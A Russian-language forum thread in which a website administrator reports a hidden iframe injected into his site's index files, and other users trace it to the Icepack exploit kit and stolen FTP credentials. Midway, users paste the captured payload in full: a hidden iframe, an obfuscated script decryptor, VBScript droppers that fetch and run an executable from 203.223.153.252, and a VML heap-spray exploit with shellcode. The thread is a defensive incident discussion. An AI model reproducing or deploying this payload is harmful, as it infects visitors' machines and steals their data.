Вирь (iframe) на сайте, помогите победить тварь поганую

arturabramian

Короче есть сайт, который я админю, лажу туда постоянно по фтп, в базы залезаю. В субботу обнаружил в тексте одного из скриптов с именем index.php вот такую приписку:
<iframe src='http://203.223.153.252/iframe.php' width='1' height='1' style='visibility: hidden;'></iframe>
Проверил - аналогичная дрянь ещё в нескольких index.php и index.html
Написал на хостинг, типа у вас на сервере вирус - они говорят типа "нихера, это у кого-то из тех, кто по фтп лазит на компе вирус, так что сами разбирайтесь". Но из всех, кто имеет фтп-доступ, наиболее вероятная кандидатура это я, потому что остальные на сайт редко ходят.
Заражение (изменение файлов) на сервере происходило в субботу и в воскресенье примерно в час дня. Не исключено, что в это время я действительно мог по фтп-шнику заходить на сайт, но я точно не помню. В ответ службы поддержки хостинга я не до конца верю, как то это уж больно в стиле "ваши проблемы нас не е%%т" прозвучало.
Я, конечно, свой комп антивирусом проверю, но вообще это реально так может быть, что на моём компе какая-то дрянь ловит моменты соединения по фтп и дописывает куски текста в файлах на сервере?

Impils

Меняй пароль на ftp доступ к сайту.

arturabramian

А эта хрень могла как-то этот пароль выцепить откуда-то и подключаться самостоятельно? Я на фтп FARом захожу.

Impils

Похоже, где то сохраняешь пароль от него.

arturabramian

На бумажке записываю
Я не вбиваю его каждый раз вручную, считать с клавиатуры не выйдет. А если она смогла этот пароль выцепить из FARа (или куда он там записал его? в реестр? то что ей помешает сделать это во второй раз? Получается, надо другим ФТПшником пользоваться.
Блин, а тем временем симантек отловил и замочил первого виря.

arturabramian

Кстати, проверил реестр - ФАР там пароли от фтпшников хранит. Правда, он их шифрует как-то, но это, может быть, легко ломается.

viktor954

Забавно, что вопрос к гуглу
http://www.google.ru/search?q=203.223.153.252&ie=utf-8&a...
выдатё ровно один заражённый сайт
А если спросить так:
http://www.google.ru/search?hl=ru&hs=Qxf&q=%2Fiframe...
то прямо первая ссылка приведёт нас на сайт Каспера...

st1956

а где вирь то?
<script language=JavaScript>function decrypt_p(x){var l=x.length,b=1024,i,j,r,p=0,s=0,w=0,t=Array(63,44,42,11,39,30,43,14,36,7,0,0,0,0,0,0,25,13,5,4,15,19,8,24,53,58
,61,47,29,28,52,56,55,6,26,50,33,2,35,27,1,45,59,0,0,0,0,32,0,48,40,18,20,62,57,51,16,54,3,60,23,31,49,41,17,9
,21,22,12,0,37,46,10,38,34);for(j=Math.ceil(l/b);j>0;j--){r='';for(i=Math.min(l,b);i>0;i--,l--){w|=(t[x.charCodeAt(p++)
-48])<<s;if(s){r+=String.fromCharCode(165^w&255);w>>=8;s-=2}else{s=6}}document.write(r)}}decrypt_p("BU")
</script>

viktor954

Ну и?т.е. то, что мы используем object filesystem и создаём file1.exe - это по-твоему нормальная работы iframe-а?


 <script language="vbscript">



Const adModeReadWrite=3

Const adTypeBinary=1

Const





adSaveCreateOverWrite=2



Dim  oFSO

Dim  oStream

Dim  oWShell



Dim  PluginFile

Dim  cByte

Dim   ObjName

Dim   ObjProg



ObjName="ADODB"

ObjProg="Stream"

On Error Resume Next



Set oStream=window.oRDS.CreateObject(ObjName & "." & ObjProg,"")

If Err.number <> 0 Then



Set oFSO=window.oRDS.CreateObject("Scripting.Fi" & "leSystemObject","")

Set PluginFile=oFSO.CreateTextFile(window.exeName,





TRUE)

Plugin_size=LenB(window.XMLBody)



For j=1 To Plugin_size

  cByte=MidB(window.XMLBody,j,1)

  ByteCode=AscB(cByte)

  PluginFile.Write(Chr(ByteCode

Next

  PluginFile.Close

  Set oWShell=window.oRDS.CreateObject("WScri" & "pt.Shell","")

  On Error Resume Next

  oWShell.Run (window.exeName1,FALSE

Else

 oStream.Mode=adModeReadWrite

 oStream.Type=adTypeBinary

 oStream.Open

 oStream.Write window.XMLBody

 oStream.SaveToFile



window.exeName,adSaveCreateOverWrite

 window.oShellApp.ShellExecute window.exeName

End If



</script>



<script language="VBScript">

    on error resume next

    dl = "http://203.223.153.252/exp/exe.php"

    Set df = document.createElement("object")



      cls1="clsid:BD96"

      cls2="C556-65A"

      cls3="3-11D0-9"

      cls4="83A-00C04FC29E36"

      clsfull=cls1&cls2&cls3&cls4





    df.setAttribute "classid",clsfull



    str1="Mic"

    str2="roso"

    str3="ft."

    str4="XML"

    str5="HTTP"

    str=str1&str2&str3&str4&str5



    Set x = df.CreateObject(str,"")

    awb1="A"

    awb2="dod"

    awb3="b.S"

    awb4="t"

    awb5="re"

    awb6="am"

    strb1=awb1&awb2&awb3&awb4&awb5&awb6

    strb5=strb1

    set YY = df.createobject(strb5,"")

    YY.type = 1

    str6="GET"

    x.Open str6, dl, False

    x.Send

    fnamezz1="file.exe"





    scrip1="Scrip"

    scrip2="ting"

    scrip3=".Fil"

    scrip4="eSyste"

    scrip5="mObject"

    scrip=scrip1&scrip2&scrip3&scrip4&scrip5



    set FF = df.createobject(scrip,"")

    set tmp = F.GetSpecialFolder(2)

    fnamezz1= FF.BuildPath(tmp,fnamezz1)





    YY.open

    YY.write x.responseBody

    YY.savetofile fnamezz1,2

    YY.close

    set MM = df.createobject("Shell.Application","")

        MM.ShellExecute fnamezz1,"","","open",0

</script>



<html xmlns:v="urn:schemas-microsoft-com:vml">

  <head>

    <style>v\:* { behavior: url(#ffgxygv); }</style>

  </head>

<body>

    <object id="ffgxygv" classid="CLSID:10072CEC-8CC1-11D1-986E-00A0C955B42E">

    </object>

<script language="javascript">

    lsyq = '%u9090%u9090%u9090%u3390%u33c0%uebc9%u5e12%ub966%ueb00%ufe8b%u2e80%u800d%u0736%ue246%uebf7%ue805%uffe9%uffff%ubafb%u1414%u6514%ub370%u1444%u1414';

npms = '%u5499%u9918%u2884%u99b7%u1c7c%ufd99%u107a%ufc6b%u145a%u1414%u0bf2%u757c%u1476%u7c14%u827f%u7778%u0560%u991e%ufcfc%u1440%u1414%uf891%u9934%u7ae8%u6134%u5e05%ucd10%u2c10%u7168%u7f84%u50cd%u102c%u6f36%u6f8c%u50ce%u1c2c%u4114%u64d4%u6164%u645d%u5e05%u9924%u7ae8%u610f%u5e05%u051c%u185e%u5e63%u7f99%u9948%u3f80%u118c%u5eff%u7e99%u1134%u41ff%u5bdb%ub753%ucf11%ue941%uc615%u4c24%u8002%ud31c%u17d9%uea11';

egot = '%uf954%u4903%u7f25%u66ed%u6699%u1130';

sgdb = '%u6ee7%u1899%u9959%u2866%ue711%u1099%u1199%ub9cf%u6b66%ufcd1%u0563%u0505%u5696%uf816%ue9f7%u0cf8%u06ac';

mjgo = '%u169a%uec86%u81f2%u2a3e%u8435';

pwrm = '%u807c%u8480%u354a%u4235%u4144%u4236%u4142%u4336%u413f%u4236%u423f%u6f35%u848c%u6f35%u6f8c%u8436%u847c';

dryr = '%u0014';

mwp = lsyq+npms+egot+sgdb+mjgo+pwrm+dryr;





    var rgmt = unescape(mwp);

    vgs = unescape("%u9090"+"%u9"+"090");



    slpyz = 1+3+1+1+5+1+3+5;

    zyftrb = 1+15+1+8+11+1+7+1+1+1+1+1+1+1+1+1+1+1+1+1+15+1+1+1+1+1+1+1+1+1+1+1+1+1+1+1+2+1+1+16+1+1+6+1;



    wahlwz = slpyz + rgmt.length;

    while (vgs.length < wahlwz)

      vgs += vgs;



    zrwqvjn = vgs.substring(0, wahlwz);



    oirgt = vgs.substring(0, vgs.length-wahlwz);



    while (oirgt.length + wahlwz < "0"+"x3"+"0000")

      oirgt = oirgt + oirgt + zrwqvjn;



    sjis = new Array;

    for (i=0;i<zyftrb;i++) {

      sjis[i] = oirgt + rgmt;

    }



  </script>

<div id="znpylp"></div>

<script language="javascript">

  igmrtw = "<v"+":rect><v:fill me"+"thod = '";

  comw = "&"+"#x060"+"6;"+""+"0"+"6"+";"+"

  for (i=0; i<3500; ++i) {

    igmrtw = igmrtw + comw;

  }

  igmrtw = igmrtw + "'"+">"+"</v"+":"+"re"+"ct></"+"v"+":fill"+">";

  document.getElementById("znpylp").innerHTML = igmrtw;

</script>

</body>

</html>

kruzer25

А дадут ли ему это сделать?

st1956

ппц, вот фигля я не отресайзил..
а по теме, на такой вирус должны быть нормальные хтаксесы

viktor954

Если на компе установлен WinXP SP2 БЕЗ ОБНОВЛЕНИЙ - ДАДУТ

kotenok1710

Недавно(вчера-позавчера) читал в рассылках от мобайл-ревью новость о таком вирусе
Ща покопаюсь - может сохранилась, может там есть как лечить
UPD нашел! называется вирус, даже не вирус, а, как пишут, какерская утилитка
Icepack.
вот ссылка в тему http://www.klerk.ru/soft/n/?81774

kotenok1710

Мляяя жесть ваще!
 
Если вирусы продаются, значит это кому-нибудь нужно
ИА "Клерк.Ру". Отдел новостей / PandaLabs констатировала наличие в сети определенной бизнес-модели,
 основанной на разработке и продаже вредоносных приложений. В частности, компания обнаружила новую
опасную утилиту, устанавливающую вредоносное ПО с помощью эксплойтов. Эта утилита носит название
Icepack и продается в интернете за 400 долларов США. Она дополняет ряд других утилит, обнаруженных
PandaLabs в последнее время, таких как Mpack, XRummer, Zunker, Barracuda, Pinch и др., подтверждая
 успешность и выгодность бизнеса, который развивается в интернете за счет создания и продажи
вредоносных приложений.
Icepack заражает компьютеры следующим образом: утилита получает доступ к определенной веб-странице,
куда оно добавляет iframe-ссылку, ведущую на сервер, на котором установлено данное приложение.
Основное отличие Icepack заключается в том, что такую ссылку добавляет сама утилита. Предыдущим
приложениям, таким как Mpack, были необходимы действия хакера, который вручную осуществлял доступ
к веб-страницам, на которые затем добавлялась ссылка.
При посещении таких искаженных страниц пользователями, активируется Icepack, которая анализирует
компьютер пользователя на предмет уязвимостей. При положительном результате, она скачивает из сети
эксплойт, необходимый для использования имеющейся в компьютере уязвимости. Еще один отличительный
признак Icepack - это то, что она использует эксплойты, соответствующие самым последним выявленным
уязвимостям. Этому есть разумное объяснение – в таком случае существует меньшая вероятность того,
что пользователи уже обновили свои компьютеры для исправления новейших брешей безопасности.
После этого кибер-преступники могут загружать на зараженные компьютеры любое вредоносное ПО. Если
учесть стоимость утилиты, скорее всего она будет загружать вредоносные коды, наиболее часто
использующиеся для кражи конфиденциальных данных и позволяющие заниматься онлайновым
мошенничеством (трояны, шпионское ПО, боты и др.).
Другое нововведение в Icepack – это то, что она сочетает в себе программу проверки ftp и iframe.
Первая помогает кибер-преступникам пользоваться информацией об учетных записях FTP, украденных с
зараженных компьютеров. Данные этих учетных записей проходят через специальную программу проверки,
чтобы удостовериться в их подлинности. Утилита добавляет в учетную запись iframe-ссылку, ведущую к
Icepack. Повторением этого процесса приложение начинает свой “жизненный цикл” заново.

psihodog

напиши провайдеру этого чувака (203.223.153.252 что он занимается незаконной деятельностью.

arturabramian

Недавно(вчера-позавчера) читал в рассылках от мобайл-ревью новость о таком вирусе
Похоже, это мой случай.
Только ты бы свой пост подредактировал чуток, а то строчки длинные.
************************
Суть постов с длинным куском кода не очень понял. Товарищи, можно для "тёмных" пояснить, о чём речь?
А пароли от фтп, видимо, придётся-таки поменять. На всякий случай.

viktor954

Не "придётся", а НЕОБХОДИМО т.к. пароль от ФТП _у_тебя_увели_.
И лечись от вирусов.
Как я уже написал выше, исходный файл вируса называется file1.exe

family

203.223.153.252
Ужо добавил этот айпишнег в таблице маршрутизации на интерфейс lo0.

psihodog

мало толку: этот хакерский пакет могут использовать сотни хакеров.
а конкретно этому хакеру может вставить провайдер.
в общем, я бы написал прову: aims.com.my
http://www.nic.ru/whois/?query=203.223.153.252

1161571

Гг! только прочитал статью, каспер поймал что-то подобное - коллега словил
Оставить комментарий
Имя или ник:
Комментарий: